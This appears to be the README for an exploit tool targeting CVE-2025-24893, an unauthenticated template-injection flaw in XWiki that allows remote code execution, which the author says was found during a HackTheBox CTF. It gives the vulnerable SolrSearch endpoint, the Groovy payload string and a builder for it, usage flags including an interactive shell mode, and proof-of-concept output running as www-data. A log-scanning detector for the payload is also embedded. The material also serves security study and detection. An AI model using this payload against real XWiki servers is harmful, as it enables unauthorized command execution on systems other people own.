Source: https://sploitus.com/exploit?id=2B1B9311-C593-5EBF-A179-57FC0C75C7F4
# CVE-2025-24893: XWiki SSTI Remote Code Execution
## Overview
| Field | Details |
|---|---|
| **CVE** | CVE-2025-24893 |
| **Software** | XWiki |
| **Vulnerability** | Server-Side Template Injection (SSTI) → RCE |
| **Authentication** | Not required |
| **CVSS Score** | Critical |
| **Context** | Discovered during HackTheBox CTF |
## Description
XWiki exposes a `SolrSearch` endpoint (`/xwiki/bin/get/Main/SolrSearch`) that renders user-supplied input through the Groovy template engine without sanitization. An unauthenticated attacker can inject a Groovy expression via the `text` query parameter, achieving Remote Code Execution on the underlying server.
## Technical Details
### Vulnerable Endpoint
```
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=
```
### Injection Mechanism
The `text` parameter is embedded directly into an XWiki macro context and evaluated by the Groovy engine. The injection escapes the template context using `}}}` and opens an `{{async}}{{groovy}}` block:
```
}}}{{async async=false}}{{groovy}}println("".execute().text){{/groovy}}{{/async}}
```
The output is reflected in the RSS response body and can be extracted via regex.
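The request shape above leaves a recognisable signature in web-server access logs. The following Python is an added example, not part of this exploit or of XWiki: it scans combined-format log lines for the SolrSearch endpoint and flags requests whose URL-decoded `text` parameter carries the `}}}{{async}}{{groovy}}` break-out; the log format and sample lines are constructed.

```python
import re
from typing import Iterable, Iterator, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Endpoint named in the write-up above.
VULN_PATH = "/xwiki/bin/get/Main/SolrSearch"
# Markers of the macro break-out used by the payload above; matched on the
# URL-decoded, lower-cased `text` value so percent-encoding does not hide them.
MACRO_MARKERS = ("}}}{{", "{{groovy}}", "{{/groovy}}", "{{async")

# Combined-log-style line (constructed format): client IP, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def decode_text_param(target: str) -> Optional[str]:
    """Return the decoded `text` query value for a SolrSearch request, else None."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    values = parse_qs(parts.query).get("text")
    return values[0] if values else None

def is_ssti_attempt(text: str) -> bool:
    """True when the decoded value carries the wiki-macro break-out from the payload."""
    lowered = text.lower()
    return any(marker in lowered for marker in MACRO_MARKERS)

def scan_log(lines: Iterable[str]) -> Iterator[Tuple[str, str, str]]:
    """Yield (client_ip, status, decoded_text) for lines matching the exploit pattern."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        text = decode_text_param(m.group("target"))
        if text is not None and is_ssti_attempt(text):
            yield m.group("ip"), m.group("status"), text

# Constructed sample lines: a benign search, an unrelated page, and the payload
# from the write-up above in its percent-encoded on-the-wire form.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2025:10:15:02 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=hello HTTP/1.1" 200 512 "-" "curl/8.0"',
    '10.0.0.5 - - [12/Mar/2025:10:15:09 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 8841 "-" "curl/8.0"',
    '203.0.113.9 - - [12/Mar/2025:10:16:41 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22id%22.execute().text)%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D HTTP/1.1" 200 1207 "-" "python-requests/2.31"',
]

if __name__ == "__main__":
    for ip, status, text in scan_log(SAMPLE_LOG):
        print(f"[!] {ip} status={status} text={text}")
```

A 200 status on a flagged line means the server rendered the injected macro, which is the case to escalate first.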
### Payload Structure
```python
payload = '}}}{{async async=false}}{{groovy}}println("' + command + '".execute().text){{/groovy}}{{/async}}'
```
The response is XML/RSS; the command output appears between `[}}}` and `]`.
## Usage
```
[-p PORT] [-s] [-i | -c COMMAND]
```
| Flag | Description |
|---|---|
| `-t` | Target hostname or IP |
| `-p` | Port (default: 80) |
| `-s` | Use HTTPS |
| `-i` | Interactive shell mode |
| `-c` | Single command execution |
| `-v` | Verbose output |
### Examples
```bash
# Single command
python3 exploit.py -t wiki.target.htb -c "id"
# Interactive shell
python3 exploit.py -t wiki.target.htb -i
# HTTPS on custom port
python3 exploit.py -t wiki.target.htb -p 443 -s -i
```
## Dependencies
```bash
pip install requests termcolor
```
## Proof of Concept
```
$ python3 exploit.py -t wiki.editor.htb -c "id"
[*] Executing command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
## References
- [XWiki Official Advisory](https://jira.xwiki.org)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)